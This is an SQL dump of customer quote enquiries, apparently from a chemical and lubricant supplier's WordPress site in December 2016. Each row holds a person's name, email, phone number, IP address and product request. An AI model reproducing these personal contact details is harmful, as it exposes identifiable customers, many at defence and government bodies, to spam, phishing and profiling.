INSERT INTO `wp_enquiry_detail_new` VALUES (327, 'Christian Chamberlain', 'christian.e.chamberlain@lmco.com', 'I am seeking a quote for MS-122AD with an order quantity of either four or six cans. ', '(303) 977-2927', 'MS-122AD Quote', '192.31.106.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-15 19:10:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (328, 'daniel deschepper', 'daniel.c.deschepper.civ@mail.mil', 'Request quote(cost &amp; availability) for 1 gallon epon 828.\n', '(410) 306-0927', 'quote', '128.63.172.74', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-15 19:34:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (329, 'Samantha Goetz', 'sgoetz@draper.com', 'I would like to request a quote for six 5 gallon drums of Vertrel XF.\n\nThank you,\nSamantha Goetz', '(617) 258-3524', 'RFQ', '192.80.95.230', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-16 15:10:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (330, 'Cheryl Randleman', 'cheryl.randleman@danmarco.com', 'Please provide a quote for MS-460H.  Not sure of amount required but please quote single can or case qty pricing.   Need response by Monday 12/19', '(419) 660-8830', 'Request for Quote', '50.54.80.78', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-16 16:03:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (331, 'Rick Hinig', 'office@hinig.com', 'Which Krytox grease would be best for the CV joints on the axles of my race car?', '(330) 340-7001', 'Krytox grease', '75.179.37.55', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"824";s:5:"title";s:7:"GPL 217";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_149749874.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-16 16:20:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (332, 'tony caiazzo', 'caiazzojr@materials-sciences.com', 'Please quote one box', '(864) 516-7000', 'MS-242N', '207.106.229.70', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-16 20:25:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (333, 'Carlos Rios', 'carlos.rios@cae.com', 'Need cost on single and as bundle for the  possible purchase of this product for cleaning our DU\'s on our Flight Simulator Fleet.', '(817) 849-0295', 'Quote', '172.56.7.244', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-16 21:40:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (334, 'Drew Harrison', 'drew_harrison@keysight.com', 'Contact Re-Nu &amp; Lube MS-739 \nI  can\'t find it on your web site for our purchasing agent. Do you still sell this? ', '(916) 788-5583', 'MS-739', '10.112.172.27', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2800";s:5:"title";s:23:"MS-730L Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_486488371.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-16 23:17:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (335, 'Chris Eastaugh', 'cseastaugh@yahoo.com.au', 'Hi, as far as I can find out your MS-907 is the only product that experts recommend for repairing the fuel bowl on old Thermoquad carburettors. Do you have a distributor in Australia, or can I order directly from you?\n\nThanks,\n\nChris\n', '+61 401 298 274', 'Thermoquad fuel bowl repair', '139.218.235.158', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-17 06:32:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (336, 'Mike Gayford', 'Mike.gayford@gmail.com', 'Please send me a quote for this product and mechanical properties of the neat resin.  Thanks.', '(440) 417-5293', 'Solid epoxy resin', '97.90.186.226', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"924";s:5:"title";s:13:"EPON™ 1001F";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-17 23:33:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (337, 'Greg', 'Gregghh@hotmail.com', 'I need a clear hard curing epoxy resin that has a glass like finish.   I also require available sizes and pricing  on said product.  Please e-mail me @:\nGregghh@hotmail.com', '', 'Price?', '208.118.105.78', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"918";s:5:"title";s:17:"EPON™ 1001-X-75";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-19 05:21:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (338, 'Kevin Florek', 'kcf@cypress.com', 'Please quote me pricing for a 1.76 lb cartridge', '(952) 851-5339', 'Krytox GPL-207', '172.18.25.209', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"814";s:5:"title";s:7:"GPL 207";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_230407642.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-19 17:57:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (339, 'Oscar Thompson', 'oscarthompson@airwayaerospace.com', 'Good Afternoon!\nCan you please send me a quote for the following chemical ?\n\nMS-381HCM / 381HM (Aerosol) 8oz or 16oz\n10-Cans\n\nThank you,\nOscar Thompson', '(305) 591-2405', 'RFQ - Connector Lubricant', '108.132.214.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1670";s:5:"title";s:7:"MS-381H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-19 19:19:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (340, 'Paul', 'stutz@nist.gov', 'Would like a quote on gallon and 5 gallon size Vertrel XF.  At the 1 gallon size, I anticipate ordering 2 to four gallons; at the five gallon size, one', '(301) 371-7813', 'Vertrel XF quote', '129.6.104.15', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-20 13:48:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (341, 'David Schroeder', 'daves@nova-tech-eng.com', 'Could you give me a price on this product in aerosol cans, and Quarts?\nthanks', '(320) 222-9640', 'MS-153', '209.240.236.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:6:"MS-153";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-20 16:14:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (342, 'Frederick Howarth', 'ADMIN@tbgwest.com', 'Hello, I would like to purchase 6 bottles of this cleaner. How do I go about doing so?', '(310) 484-1744', 'Purchasing inquiry', '100.43.239.82', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-20 16:17:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (343, 'Roger Rask', 'roger.rask@vishay.com', 'Hello I need a quote on a Quart size of MS-143XD\nI also need a C of C.\nThanks, Roger', '(864) 689-1020', 'MS-143XD', '23.125.160.28', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:8:"MS-143XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-20 20:11:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (344, 'Howard Tai', 'Howard.Tai@cognex.com', 'Hello,\n\nCan you please e-mail me a quote for a case of 12 cans of the MS-22N Aero Duster? \n\nThanks', '(508) 650-4137', 'Quote for a case of 12 cans', '63.172.247.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-20 23:23:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (345, 'Ryan Hunter', 'ryan.hunter@navy.mil', 'To whom it may concern,\n\nThis request is to obtain a price/quote for Krytox 240 AZ NLGI Grade 1. I do not know the standard sizes of product in terms of ounces, though for my application a single 2 to 8 ounce tube would be adequate. If further information is required, please let me know.\n\nVery respectfully,\nRyan', '(760) 939-7893', 'Krytox 240 AZ NLGI Grade 1 Price Quote', '138.163.0.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"638";s:5:"title";s:5:"240AZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_300460277.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-21 15:16:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (346, 'Amy Stucker', 'astucker@servotronics.com', 'Good Morning,\nWe are interested in getting a quote for one tube of the 240AC.  We would need certs as well.\nPlease advise at your earliest convenience. \nThank you!\nHave a wonderful day!', '(716) 655-5990', 'RFQ for 240AC', '50.75.189.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-21 15:31:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (347, 'Gary Liechty', 'gdliechty@alliedhightech.com', 'I\'d like a GHS compliant SDS for this product, if possible.  ', '(310) 635-2466', 'SDS', '67.91.66.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1801";s:5:"title";s:16:"Teflon Multi-Use";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/teflon-multi-use-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-21 19:30:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (348, 'Martina Partido', 'docmaty@yahoo.com', 'Pls send me via email prices for the handpice oil (dropper style)', '(831) 731-0200', 'Dental handpiece oil', '216.228.11.173', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"474";s:5:"title";s:30:"FluoroExtreme Dental Lubricant";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/DENTAL.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-22 15:31:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (349, 'Brian Murphy', 'bmurphy@blueorigin.com', 'Do you carry Krytox 143AA in stock, and if so what quantities and prices are they sold in?', '(909) 225-3066', 'Krytox 143AA', '72.165.233.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"579";s:5:"title";s:5:"143AA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_204603724.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-22 20:46:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (350, 'Henry Liang', 'H.liang@ttuhsc.edu', 'Dear Sir/Madam,\n\nI\'d like to request a sample of both Krytox 157FSL and 157FSH (~500g each) for research and education. If you don\'t provide samples, I\'d like to receive a quote of each one (~500g each). Thank you.\n', '(806) 743-1463', 'Krytox 157FSL and 157FSH', '66.230.10.191', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-22 21:36:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (351, 'DINH NGOC DUY', 'dinhngocduy@u.nus.edu', 'Dear miller-stephenson, \n\nI want to buy  Krytox 157 FSH ( smallest bottle). \nWould you please send me a quotation?\n\nThanks, \nDuy', '+65 9348 9218', 'Buy 157 FSH', '172.17.18.41', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-24 02:29:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (352, 'Eddie Limbaga', 'Eddie@hybridhockey.com', 'I am interested in a product to use on skate Bearings.   One product to be used on bearings to  lubricate, protect against wear and corrosion. ', '(909) 556-9590', 'Product for bearings', '172.115.77.40', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"996";s:5:"title";s:6:"XP 1A3";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-oil-grease-4.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-27 14:58:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (353, 'DON RYAN', 'DON@NDS-INC.COM', 'NEED PRICING ON 200  MS-222N', '(515) 274-0004', 'QUOTE', '65.101.160.94', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-27 15:52:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (354, 'Hwei Ong', 'ongh@mail.nih.gov', 'Hello,\nCan you tell me the pricing for this item?  If you have a dealer, please let me know as well.\nThanks.\nHwei Ling.', '(301) 594-1647', 'Pricing and dealer', '128.231.87.55', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-27 20:43:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (355, 'Eva Daglioglu', 'eva.daglioglu@global-aviation.eu', 'Dear sales, pls quote Krytox 250AD - 2OZ\nQTY: 2 EA or MOQ\n\nThank you\n\nBest regards\nEva', '+49 4193 8803640', 'RFQ', '46.59.151.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"648";s:5:"title";s:5:"250AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_321602429.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-28 08:58:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (356, 'kemi oredugba', 'kemi.oredugba@ajw-aviation.com', 'Good Afternoon\nKindly send me a quote for P/N: M-122AD description : PTFE RELEASE AGENT, DRY LUBRICANT (MILLER STEPHENSON)\nqty 12\n', '+44 1403 798650', 'quote ', '212.42.163.49', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-28 15:56:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (357, 'markoh', 'markoh@bitrogroup.com', 'We bought it on August\nPrice from August:\n24 cans @ $15.45/can\n\nPlease let me know the quote of 36 cans.\n\n', '(860) 315-0107', 'Quotation', '173.63.236.163', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-28 18:59:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (358, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'test', '', 'test', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"347";s:5:"title";s:7:"GPL 200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_153282266.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-28 20:41:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (359, 'Jared Grinstead', 'Jared.Grinstead@WETDesign.com', 'Please quote 2 cans of MS-460H.\n\nThank you,\nJared', '(919) 608-6884', 'Want to buy MS-460H', '74.87.24.203', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-29 00:41:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (360, 'jerry', 'jerry@jetlube.com.cn', 'would you please help to quote NRT 8908  1KG/CAN  5cans with exw or fob price?\nJerry from Shanghai,China.\n\nLooking forward to your comments.', '', '', '116.226.238.239', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"881";s:5:"title";s:8:"NRT 8908";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_18414949.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-29 09:29:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (361, 'jerry', 'jerry@jetlube.com.cn', 'How much is this item:283AD  7kg/pail  1pail\nexw or fob price?\nLooking forward to your comments.\n\nBest regards!', '', '', '116.226.238.239', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"656";s:5:"title";s:5:"283AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:97:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-grease-aerospace-aviation.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-29 09:33:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (362, 'Paven Patel', 'ppatel@epoxyset.com', 'Pricing for 10 gallons', '', 'Epon 8280', '70.183.169.152', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"891";s:5:"title";s:12:"EPON™ 8280";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-8280.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-29 17:22:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (363, 'Siddharth ', 'Siddharth_Dev@student.uml.edu', 'Hi,\n\nMy name is Sidd. I  am a PhD student at UMass Lowell. We have ordered EPON 828) from you in the past but the shelf life has been exceeded and we would like to order it again. I need to fill in a price on our online purchasing system even if it\'s just an estimate. Typically we have purchased 1 gallon containers I believe but open to quotes for 1 and 5 gallon containers if that\'s how you sell them. \n\nThanks', '(917) 972-7519', 'Price inquiry ', '116.15.197.204', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-30 05:51:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (364, 'Royal', 'rroyal8@gmail.com', 'We are currently out and need some more.. how much does it cost per can and where can we buy more? ', '', 'Cost of MS-738', '69.2.20.122', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1840";s:5:"title";s:6:"MS-738";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-30 21:34:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (365, 'Prashanth k', 'indus_enterprise@yahoo.co.in', 'Dear Sir/Madam,\n\nPlease send your offer for Aero Duster MS-222N\n\nThanks  &amp; Regards\nPrashanth.K	\nManager( Engg &amp; QC)\nM-7097577190\nINDUS ENTERPRISES \nWorks: Plot No.: 14,\n IDA – Gandhi Nagar, \nQutbullapur  Mandal,\n Ranga Reddy Dist.-500037\nINDIA,Ph. No.: 040-65870987\nE-mail: indusenterprise@yahoo.com\n', '(709) 757-7190', 'Request For Quote ', '103.245.197.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-12-31 04:16:49', '', NULL, '', '', '', NULL, '', ''); 
